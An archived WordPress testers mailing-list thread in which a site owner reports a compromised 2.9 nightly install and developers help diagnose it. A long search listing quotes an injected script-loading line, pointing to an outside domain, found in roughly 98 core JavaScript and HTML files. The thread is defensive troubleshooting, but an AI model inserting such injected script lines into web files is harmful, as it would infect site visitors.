[wp-testers] 2.8.6 Beta1
Tom Klingenberg
tklingenberg at lastflood.net
Fri Nov 20 10:00:58 UTC 2009
scan your upload folder for .php files. you might find an attacker script
in there.
tom
Am 20.11.2009, 10:57 Uhr, schrieb Dion Hulse (dd32) <wordpress at dd32.id.au>:
> it appears to have inserted that after </head> in all the .html and .php
> files it could find. and the document.write in all .js's.
>
> I dont think its a WordPress vulnerability, as its affecting the files
> rather than actual posts..
>
> I'd be tempted to suggest a full virus scan of your computer..
> possibility its stealing your FTP credentials?
>
> Any other websites on that account afected? what about files outside of
> Wordpress?
>
> On Fri, 20 Nov 2009 20:53:10 +1100, Naudirz <naudirz at gmail.com> wrote:
>
>> here are more info
>>
>> Search "northstarsocal.com" (98 hits in 98 files)
>> C:\Users\Användaren\Documents\Downloads\sidan\readme.html (1 hits)
>> Line 8: <script
>> src=http://northstarsocal.com/testpage/contact.php></script><body>
>> C:\Users\Användaren\Documents\Downloads\sidan\wordpress.2009-11-20.xml
>> (1
>> hits)
>> Line 1: <script
>> src=http://northstarsocal.com/testpage/contact.php></script><?xml
>> version="1.0" encoding="UTF-8"?>
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-content\plugins\wp-security-scan\js\scripts.js
>> (1 hits)
>> Line 29: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-content\plugins\wp-security-scan\scripts.js
>> (1 hits)
>> Line 30: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\autosave.dev.js
>> (1 hits)
>> Line 309: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\autosave.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\codepress.html
>> (1 hits)
>> Line 30: if(engine == "msie" || engine == "gecko")
>> document.write('<script
>> src=http://northstarsocal.com/testpage/contact.php ></script><body><pre>
>> </pre></body>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\codepress.js
>> (1 hits)
>> Line 139: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\gecko.js
>> (1 hits)
>> Line 294: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\msie.js
>> (1 hits)
>> Line 305: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\engines\opera.js
>> (1 hits)
>> Line 262: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\asp.js
>> (1 hits)
>> Line 118: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\autoit.js
>> (1 hits)
>> Line 34: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\csharp.js
>> (1 hits)
>> Line 26: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\css.js
>> (1 hits)
>> Line 25: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\generic.js
>> (1 hits)
>> Line 27: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\html.js
>> (1 hits)
>> Line 61: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\java.js
>> (1 hits)
>> Line 26: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\javascript.js
>> (1 hits)
>> Line 32: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\perl.js
>> (1 hits)
>> Line 29: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\php.js
>> (1 hits)
>> Line 62: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\ruby.js
>> (1 hits)
>> Line 28: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\sql.js
>> (1 hits)
>> Line 32: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\text.js
>> (1 hits)
>> Line 11: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\vbscript.js
>> (1 hits)
>> Line 118: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\codepress\languages\xsl.js
>> (1 hits)
>> Line 104: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\colorpicker.dev.js
>> (1 hits)
>> Line 709: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\colorpicker.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\comment-reply.dev.js
>> (1 hits)
>> Line 50: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\comment-reply.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\crop\cropper.js
>> (1 hits)
>> Line 518: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\hoverIntent.dev.js
>> (1 hits)
>> Line 129: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\hoverIntent.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\imgareaselect\jquery.imgareaselect.dev.js
>> (1 hits)
>> Line 693: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\imgareaselect\jquery.imgareaselect.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jcrop\jquery.Jcrop.dev.js
>> (1 hits)
>> Line 1199: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jcrop\jquery.Jcrop.js
>> (1 hits)
>> Line 164: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\interface.js
>> (1 hits)
>> Line 14: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.color.dev.js
>> (1 hits)
>> Line 130: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.color.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.form.dev.js
>> (1 hits)
>> Line 874: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.form.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.hotkeys.dev.js
>> (1 hits)
>> Line 129: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.hotkeys.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.js
>> (1 hits)
>> Line 22: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.schedule.js
>> (1 hits)
>> Line 37: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.table-hotkeys.dev.js
>> (1 hits)
>> Line 101: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\jquery.table-hotkeys.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\suggest.dev.js
>> (1 hits)
>> Line 331: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\suggest.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.core.js
>> (1 hits)
>> Line 11: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.dialog.js
>> (1 hits)
>> Line 16: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.draggable.js
>> (1 hits)
>> Line 14: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.droppable.js
>> (1 hits)
>> Line 15: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.resizable.js
>> (1 hits)
>> Line 14: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.selectable.js
>> (1 hits)
>> Line 14: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.sortable.js
>> (1 hits)
>> Line 14: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\jquery\ui.tabs.js
>> (1 hits)
>> Line 14: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\json2.dev.js
>> (1 hits)
>> Line 483: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\json2.js
>> (1
>> hits)
>> Line 13: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\prototype.js
>> (1 hits)
>> Line 4185: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\quicktags.dev.js
>> (1 hits)
>> Line 579: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\quicktags.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\builder.js
>> (1 hits)
>> Line 138: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\controls.js
>> (1 hits)
>> Line 967: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\dragdrop.js
>> (1 hits)
>> Line 976: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\effects.js
>> (1 hits)
>> Line 1124: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\prototype.js
>> (1 hits)
>> Line 4185: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\scriptaculous.js
>> (1 hits)
>> Line 59: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\slider.js
>> (1 hits)
>> Line 277: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\sound.js
>> (1 hits)
>> Line 57: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\unittest.js
>> (1 hits)
>> Line 569: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\scriptaculous\wp-scriptaculous.js
>> (1 hits)
>> Line 61: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfobject.js
>> (1 hits)
>> Line 6: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\handlers.dev.js
>> (1 hits)
>> Line 339: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\handlers.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.cookies.js
>> (1 hits)
>> Line 55: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.queue.js
>> (1 hits)
>> Line 100: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.speed.js
>> (1 hits)
>> Line 343: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\plugins\swfupload.swfobject.js
>> (1 hits)
>> Line 107: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\swfupload-all.js
>> (1 hits)
>> Line 10: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\swfupload\swfupload.js
>> (1 hits)
>> Line 982: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\thickbox\thickbox.js
>> (1 hits)
>> Line 323: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\blank.htm
>> (1 hits)
>> Line 6: <script
>> src=http://northstarsocal.com/testpage/contact.php></script><body
>> class="mceContentBody">
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\langs\wp-langs-en.js
>> (1 hits)
>> Line 433: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\tiny_mce.js
>> (1 hits)
>> Line 3: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\tiny_mce_popup.js
>> (1 hits)
>> Line 6: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\editable_selects.js
>> (1 hits)
>> Line 71: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\form_utils.js
>> (1 hits)
>> Line 201: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\mctabs.js
>> (1 hits)
>> Line 78: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\utils\validate.js
>> (1 hits)
>> Line 221: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tinymce\wp-tinymce.js
>> (1 hits)
>> Line 30: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tw-sack.dev.js
>> (1 hits)
>> Line 195: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\tw-sack.js
>> (1
>> hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-ajax-response.dev.js
>> (1 hits)
>> Line 66: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-ajax-response.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-lists.dev.js
>> (1 hits)
>> Line 361: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>> C:\Users\Användaren\Documents\Downloads\sidan\wp-includes\js\wp-lists.js
>> (1 hits)
>> Line 2: document.write('<script src=
>> http://northstarsocal.com/testpage/contact.php ><\/script>');
>>
>>
>>
>> On Fri, Nov 20, 2009 at 9:57 AM, Dion Hulse (dd32)
>> <wordpress at dd32.id.au>wrote:
>>
>>> What are the symptoms of the hack?
>>>
>>> Install something to log all post requests ASAP, to gather data if its
>>> a
>>> new vulnerability: http://www.village-idiot.org/post-logger
>>>
>>> You'd not by any chance be on MediaTemple servers would you? *(Who's
>>> your
>>> webhost)
>>>
>>>
>>> On Fri, 20 Nov 2009 19:52:46 +1100, Naudirz <naudirz at gmail.com> wrote:
>>>
>>> OK, cause my 2.9 nightly gets hacked every day..
>>>> in that case its a new security bug..
>>>> Ive wasted every file/folde an done a fresh installation, everything
>>>> except
>>>> the db is new, also passwd is changed on everything except db.
>>>> No extra user is in db.
>>>>
>>>>
>>>>
>>>> On Fri, Nov 20, 2009 at 9:39 AM, Dion Hulse (dd32)
>>>> <wordpress at dd32.id.au
>>>> >wrote:
>>>>
>>>> Yes. Everything in the 2.8 branch are backports from the 2.9 branch.
>>>>>
>>>>>
>>>>>
>>>>> On Fri, 20 Nov 2009 19:35:20 +1100, Naudirz <naudirz at gmail.com>
>>>>> wrote:
>>>>>
>>>>> Hi!
>>>>>
>>>>>> Is this fix also in 2.9 nightlybuild?
>>>>>>
>>>>>> /Phibrz
>>>>>>
>>>>>> On Thu, Nov 12, 2009 at 5:43 PM, Ryan Boren <ryan at boren.nu> wrote:
>>>>>>
>>>>>> http://wordpress.org/wordpress-2.8.6-beta1.zip
>>>>>>
>>>>>>>
>>>>>>> Fixes these two security issues:
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>> https://core.trac.wordpress.org/query?status=closed&group=resolution&milestone=2.8.6
>>>>>>>
>>>>>>> A logged in user with author privileges is required to exploit.
>>>>>>> Press
>>>>>>> This and uploads need testing.
More information about the wp-testers
mailing list